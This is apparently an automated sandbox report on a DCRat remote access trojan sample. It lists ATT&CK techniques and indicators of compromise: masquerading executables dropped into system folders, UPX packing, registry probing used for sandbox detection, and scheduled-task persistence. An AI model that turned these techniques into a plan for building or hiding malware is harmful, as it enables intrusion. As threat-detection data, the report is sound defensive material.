299 https://storage.googleapis.com/script.aniview.com/ssync/62f53b2c7850d0786f227f64/ssync.html
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Drops file in System32 directory 1 IoCs

Processes:

windowssdk.exe

description ioc process

File created C:\Windows\System32\DriverDisplayKeyboard.dll windowssdk.exe

flow	ioc
311	raw.githubusercontent.com
861	raw.githubusercontent.com

flow	ioc
299	https://storage.googleapis.com/script.aniview.com/ssync/62f53b2c7850d0786f227f64/ssync.html

description	ioc	process
File created	C:\Windows\System32\DriverDisplayKeyboard.dll	windowssdk.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Windows\windowssdk.exe	upx
behavioral1/memory/8156-8459-0x00007FF745520000-0x00007FF745CA7000-memory.dmp	upx
behavioral1/memory/8156-8617-0x00007FF745520000-0x00007FF745CA7000-memory.dmp	upx
behavioral1/memory/8156-9577-0x00007FF745520000-0x00007FF745CA7000-memory.dmp	upx

Drops file in Program Files directory 9 IoCs

Processes:

blockwinref.exe

description	ioc	process
File created	C:\Program Files\Windows Photo Viewer\c5b4cb5e9653cc	blockwinref.exe
File created	C:\Program Files\Windows Sidebar\conhost.exe	blockwinref.exe
File created	C:\Program Files\Windows Sidebar\088424020bedd6	blockwinref.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_2021.226.1915.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\explorer.exe	blockwinref.exe
File created	C:\Program Files\dotnet\unsecapp.exe	blockwinref.exe
File created	C:\Program Files\dotnet\29c1c3cc0f7685	blockwinref.exe
File created	C:\Program Files\Windows Photo Viewer\services.exe	blockwinref.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.371\backgroundTaskHost.exe	blockwinref.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.371\eddb19405b7ce1	blockwinref.exe

Drops file in Windows directory 8 IoCs

Processes:

blockwinref.exeDCRat.exewindowssdk.exe

description	ioc	process
File created	C:\Windows\Offline Web Pages\backgroundTaskHost.exe	blockwinref.exe
File created	C:\Windows\Offline Web Pages\eddb19405b7ce1	blockwinref.exe
File created	C:\Windows\windowssdk.exe	DCRat.exe
File created	C:\Windows\ZLLQEAGY.bin	windowssdk.exe
File created	C:\Windows\IdentityCRL\blockwinref.exe	blockwinref.exe
File created	C:\Windows\IdentityCRL\f93c7c943addf0	blockwinref.exe
File created	C:\Windows\bcastdvr\WmiPrvSE.exe	blockwinref.exe
File created	C:\Windows\bcastdvr\24dbde2999530e	blockwinref.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 27 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

DCRat.exeDCRatBuild.exeWScript.exeDCRatBuild.exeDCRatBuild.exeWScript.execmd.exeWScript.exeWScript.exeDCRatBuild.exeDCRatBuild.exeDCRCC.execsc.exeDCRatBuild.execvtres.exeRar.exewRar.execmd.exeWScript.exeDCRatBuild.exepowershell.exeDCRatBuilder.exedotNET_Reactor.execvtres.exeWScript.execsc.exeDCRatBuild.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DCRat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DCRatBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DCRatBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DCRatBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DCRatBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DCRatBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DCRCC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DCRatBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rar.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wRar.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DCRatBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DCRatBuilder.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dotNET_Reactor.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DCRatBuild.exe

Checks processor information in registry 2 TTPs 52 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

firefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe

Modifies registry class 64 IoCs

Processes:

firefox.exefirefox.exefirefox.exejavaw.exeBackgroundTransferHost.exefirefox.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Downloads"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings	javaw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\MuiCache	BackgroundTransferHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	javaw.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	javaw.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "4"	javaw.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	javaw.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	javaw.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 020000000100000000000000ffffffff	javaw.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	javaw.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	javaw.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202	javaw.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	javaw.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	javaw.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	javaw.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	javaw.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 010000000200000000000000ffffffff	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257"	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	firefox.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	javaw.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "2"	javaw.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Downloads"	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "6"	javaw.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	javaw.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2 = 14002e803accbfb42cdb4c42b0297fe99a87c6410000	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616193"	firefox.exe

NTFS ADS 1 IoCs

Processes:

firefox.exe

description ioc process

File created C:\Users\Admin\Downloads\dcrat.zip:Zone.Identifier firefox.exe

description	ioc	process
File created	C:\Users\Admin\Downloads\dcrat.zip:Zone.Identifier	firefox.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 36 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

pid	process
3408	schtasks.exe
4756	schtasks.exe
1460	schtasks.exe
4452	schtasks.exe
2720	schtasks.exe
892	schtasks.exe
6968	schtasks.exe
5800	schtasks.exe
6760	schtasks.exe
6644	schtasks.exe
7140	schtasks.exe
5696	schtasks.exe
4608	schtasks.exe
6696	schtasks.exe
6840	schtasks.exe
3396	schtasks.exe
704	schtasks.exe
1356	schtasks.exe
3788	schtasks.exe
2776	schtasks.exe
2156	schtasks.exe
4124	schtasks.exe
1156	schtasks.exe
2224	schtasks.exe
7980	schtasks.exe
7152	schtasks.exe
7952	schtasks.exe
4612	schtasks.exe
7476	schtasks.exe
8008	schtasks.exe
5416	schtasks.exe
7680	schtasks.exe
3836	schtasks.exe
7256	schtasks.exe
2960	schtasks.exe
5000	schtasks.exe

Suspicious behavior: EnumeratesProcesses 37 IoCs

Processes:

powershell.exeblockwinref.exedwm.exebackgroundTaskHost.exe

pid	process
2092	powershell.exe
2092	powershell.exe
2092	powershell.exe
2028	blockwinref.exe
2028	blockwinref.exe
2028	blockwinref.exe
2028	blockwinref.exe
2028	blockwinref.exe
